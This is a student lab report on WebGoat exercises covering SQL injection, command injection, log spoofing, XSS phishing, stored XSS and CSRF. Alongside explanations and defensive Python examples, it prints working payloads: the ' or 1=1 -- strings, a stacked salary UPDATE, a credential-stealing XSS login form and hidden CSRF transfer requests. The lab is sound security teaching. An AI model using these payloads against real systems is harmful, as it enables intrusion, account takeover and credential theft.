20165302 Exp9 Web Security Basics

Purpose

The goal of this lab is to understand the basic principles of common network attack techniques and to practise the related exercises in WebGoat.

Answers to the basic questions

(1) The principle of SQL injection attacks and how to defend against them

  • So-called SQL injection means inserting SQL commands into a web form submission, a query string or a page request so that the server is tricked into executing malicious SQL. Specifically, it exploits the application's ability to pass (malicious) SQL on to the back-end database engine: by entering (malicious) SQL statements in a web form, an attacker uses a vulnerability on the site to query the database with SQL of their own, instead of the SQL the designer intended. Web forms that place user-submitted characters directly into a query are especially vulnerable to SQL injection.
  • Defense: the most common approach is keyword checking in the business-logic layer, where SQL keywords such as *, or, select and delete in the input are replaced. The most effective approach is still to use parameterized SQL queries (bound variables) and to avoid building SQL by concatenating strings.

(2) The principle of XSS attacks and how to defend against them

  • The principle is to inject a piece of JavaScript code into a page. When other users visit the page, the injected JS runs in their browser, which lets the attacker achieve things such as taking control of their account.

Stored XSS attacks: a reflected XSS attack can only hit the particular user who clicks the link, whereas a stored XSS attack can hit every user. The classic case is a user's signature panel: the user can customise it, its content is stored in the database, and when other users view it, it is loaded from the database. If a malicious user has injected a JS reference into their signature box, everyone who views it is controlled by that JS.

  • Defense: keyword checking, replacing keywords such as script and src when they appear; and encoding content before it is returned, for example converting angle brackets into an encoded (Unicode-escaped) form.

(3) The principle of CSRF attacks and how to defend against them

  • CSRF stands for Cross-Site Request Forgery. After the user has logged in to the target site, the attacker lures the user into visiting a page that exploits the target site's trust in that user: the page forges a request in the user's name to the target site, performing the attacker's chosen action on the target site and thereby achieving the attack.
  • Defense: add a token field to the form tag. The attacker cannot guess the token because it changes: for example, add a UUID token to the form and save it in the server-side session. Since the attacker cannot guess the random token, they cannot construct a link that performs the action.

Experimental Procedure

1. WebGoat installation

  • Download WebGoat from https://github.com/WebGoat/WebGoat/releases/tag/7.0.1
  • In the virtual machine, run the following in the directory containing the package: java -jar webgoat-container-7.0.1-war-exec.jar

  • In the browser, enter localhost:8080/WebGoat, log in with the default password shown on the page, and start the exercises.

2. SQL injection attacks

(1) Command Injection

  • Right-click on the page and select Inspect Element to view the page elements and modify the source: pick any entry in the check box column, right-click it, choose Edit As HTML, and append "& netstat -an & ipconfig".
  • Click View: the appended commands are executed and the network port usage and the IP address are displayed. The attack succeeded!

(2) Numeric injection
  • Right-click on the page, select Inspect Element to modify the source, and append or 1=1 to the value of the selected city's number.
  • The weather conditions of all cities are displayed.

(3) Log spoofing

  • In the User Name field enter webgoat%0d%0aLogin Succeeded for username: admin. The carriage return and line feed %0d%0a cause two lines to appear in the log.
    After entering the password and clicking Login, you can see that WebGoat displays the Login Failed line, and the statement we added is displayed on the next line.
  • An attacker could use this to add a malicious script to the log file; the script would then return information when the administrator views the log in a browser. For example, entering admin<script>alert(document.cookie)</script> as the user name pops up the cookie information.
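An added example, not from the lab or from WebGoat, of the defense for this step: it shows how the %0d%0a payload splits a log entry in two when the username is written verbatim, and a logger that neutralizes control characters so that one request can only ever produce one log line. The function names and the log-line format are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed input: the lab's "webgoat%0d%0aLogin Succeeded for username: admin"
# after the server has URL-decoded it (so it contains a real CR LF).
LAB_USERNAME = unquote("webgoat%0d%0aLogin Succeeded for username: admin")


def log_line_vulnerable(username, succeeded):
    # Copies the username into the entry verbatim: the embedded CR LF terminates
    # the genuine line and everything after it appears as a forged second entry.
    status = "Login Succeeded" if succeeded else "Login Failed"
    return f"{status} for username: {username}"


# Every C0 control character (including CR and LF) plus DEL.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def log_line_safe(username, succeeded):
    # Replace CR, LF and every other control character with a visible escape
    # before the value reaches the log, so the entry stays on one line and the
    # administrator can still see that something odd was submitted.
    clean = CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group(0)), username)
    status = "Login Succeeded" if succeeded else "Login Failed"
    return f"{status} for username: {clean}"
```

The browser-facing log viewer mentioned in the last step additionally needs the output encoding described under question (2), since neutralizing line breaks does nothing against a stored <script> tag.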

(4) SQL injection

  • Click Injection Flaws, then String SQL Injection, and in the Enter Message box
    query the user name Smith' or 1=1--: the ' closes the string that was opened before it, or 1=1 is always true, and -- comments out the rest of the statement, so all the data in the table is selected.

(5) LAB: SQL Injection

  • Enter ' or 1=1 -- as the password; the login fails, and you find that only part of the input was taken as the password, i.e. the password length is limited.

  • Right-click the Password box, choose Inspect Element to view the page elements, change the maximum length to 50, and try again.

(6) Database backdoor

  • Enter 101 to obtain that user's information.

  • Enter the injected statement 101; update employee set salary=10000
  • The backdoor was created successfully.
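The string injection of (4) and (5) and the stacked UPDATE of (6), as an added example that is not part of the lab or of WebGoat: a constructed SQLite table stands in for the employee table, and each vulnerable query is paired with the parameterized form recommended as the most effective defense in question (1). The names make_db, lookup_vulnerable, lookup_safe, profile_vulnerable, profile_safe and salaries are chosen here, and executescript stands in for a driver that accepts several statements per call.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for WebGoat's employee table (sample rows, not WebGoat's data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE employee (userid INTEGER, last_name TEXT, salary INTEGER)")
    con.executemany("INSERT INTO employee VALUES (?, ?, ?)",
                    [(101, "Smith", 3000), (102, "Jones", 4500), (103, "Lee", 5200)])
    return con


def lookup_vulnerable(con, last_name):
    # Splices the input into the SQL text. With Smith' or 1=1-- the quote is
    # closed, "or 1=1" is always true and "--" comments out the trailing quote,
    # so every row comes back (the string SQL injection lesson).
    sql = "SELECT userid, last_name, salary FROM employee WHERE last_name = '" + last_name + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con, last_name):
    # Bound parameter: the database compares the whole input as one literal
    # string, so the injection text simply matches no row.
    sql = "SELECT userid, last_name, salary FROM employee WHERE last_name = ?"
    return con.execute(sql, (last_name,)).fetchall()


def profile_vulnerable(con, userid_text):
    # executescript models a driver that runs several statements in one call:
    # "101; update employee set salary=10000" executes the UPDATE as a second
    # statement (the database backdoor lesson).
    con.executescript("SELECT userid, last_name, salary FROM employee WHERE userid = " + userid_text)


def profile_safe(con, userid_text):
    # Validate the numeric input, then bind it: a stacked statement is rejected
    # before it can reach the database as SQL.
    if not userid_text.isdigit():
        raise ValueError("userid must be a whole number")
    sql = "SELECT userid, last_name, salary FROM employee WHERE userid = ?"
    return con.execute(sql, (int(userid_text),)).fetchall()


def salaries(con):
    # Helper used to observe whether the backdoor UPDATE ran.
    return [row[0] for row in con.execute("SELECT salary FROM employee ORDER BY userid")]
```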

3. XSS attacks

(1) Phishing with XSS (cross-site scripting phishing attack)

  • Click Cross-Site Scripting (XSS), then Phishing with XSS.
  • Enter the following code in the search box: <form><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br></form><br><br><HR>. The page then shows the injected login form.
  • Enter the code:
<script> function hack() { alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ""; } </script> <form> <br><br><HR><H3>This feature requires account login:</H3><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form><br><br><HR>
  • When a user name and password are typed into the displayed login form, the entered information is captured by WebGoat and fed back to us.

(2) Stored XSS Attacks

  • Construct the injected statement in the Message box and enter any title;
    the newly created post can then be found under that title.
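Output encoding, the defense named in question (2), as an added example that is not the lab's or WebGoat's code: constructed copies of the lab's phishing form and stored <script> message are passed through encoders for each output context (HTML body, an attribute, and a string inside a <script> block, where the angle brackets become Unicode escapes). The function names are assumptions.

```python
import html
import json

# Constructed test input, copied from the lab steps above; used only to show
# what the encoders do to it.
PHISH_SNIPPET = ('<form><H3>This feature requires account login:</H3>'
                 '<input type="text" id="user" name="user"></form>')
STORED_SCRIPT = "<script>alert(document.cookie)</script>"


def render_search_vulnerable(query):
    # Reflects the query straight into the page: injected HTML becomes part of the DOM.
    return "<p>Results for: " + query + "</p>"


def render_search_safe(query):
    # HTML body context: & < > " ' become entities, so the browser displays the
    # payload as text instead of parsing it as markup.
    return "<p>Results for: " + html.escape(query) + "</p>"


def render_message_safe(title, body):
    # Stored content is encoded at render time, once per output context: the
    # title lands in a quoted attribute and in element content, the body in
    # element content. html.escape covers both because it also encodes quotes.
    return ('<div class="post" data-title="%s"><h4>%s</h4><p>%s</p></div>'
            % (html.escape(title), html.escape(title), html.escape(body)))


def js_string_literal(value):
    # For user data placed inside a <script> block: JSON-encode it and then
    # Unicode-escape < > & so the text "</script>" can never close the element.
    encoded = json.dumps(value)
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
```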

4. CSRF attacks

(1) Cross Site Request Forgery

  • Write a URL into the Message box as a hidden picture that other users cannot see; as soon as a user opens the message, it triggers the CSRF request.
  • Enter in the Message box: <img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />
  • Clicking the message downloads and displays the message page, and the user unknowingly performs the funds transfer.
(2) CSRF Prompt By-Pass
  • Look up the values of the Screen and menu parameters on the page, enter a title, and in the Message box enter the code:
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>
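The session-token defense from question (3), as an added example that is not the lab's or WebGoat's code: a random per-session token is written into the transfer form as a hidden field, and both steps of the transfer (the amount, and the CONFIRM step from (2)) are rejected when the request does not carry it, which is exactly what the lab's hidden <img> and <iframe> requests lack. The field name csrf_token, the session layout, the handler and params_from_url are assumptions; secrets.token_hex is used in place of a UUID.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

TOKEN_FIELD = "csrf_token"  # hypothetical field name; the page does not name WebGoat's


def new_session():
    # Server-side session holding the random token and a constructed balance.
    return {"csrf_token": secrets.token_hex(16), "balance": 10000}


def render_transfer_form(session):
    # The token is emitted as a hidden field that only the genuine page carries;
    # the action uses the lab's [scr]/[menu] placeholders.
    return ('<form method="post" action="attack?Screen=[scr]&menu=[menu]">'
            '<input type="hidden" name="%s" value="%s">'
            '<input type="text" name="transferFunds"><input type="submit" value="Transfer">'
            '</form>' % (TOKEN_FIELD, session["csrf_token"]))


def handle_transfer(session, params):
    # params: request parameters as single values. Every step, including the
    # CONFIRM step, must present a token equal to the session's; compare_digest
    # keeps the comparison constant-time.
    sent = params.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(sent, session["csrf_token"]):
        return "rejected: missing or invalid CSRF token"
    amount = params.get("transferFunds", "")
    if amount == "CONFIRM":
        pending = session.pop("pending", None)
        if pending is None:
            return "rejected: nothing to confirm"
        session["balance"] -= pending
        return "transferred %d" % pending
    if not amount.isdigit():
        return "rejected: bad amount"
    session["pending"] = int(amount)
    return "confirm transfer of %d" % int(amount)


def params_from_url(url):
    # Flattens a GET request such as the lab's hidden <img src=...> into params.
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
```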

Origin www.cnblogs.com/dky20165302/p/10867572.html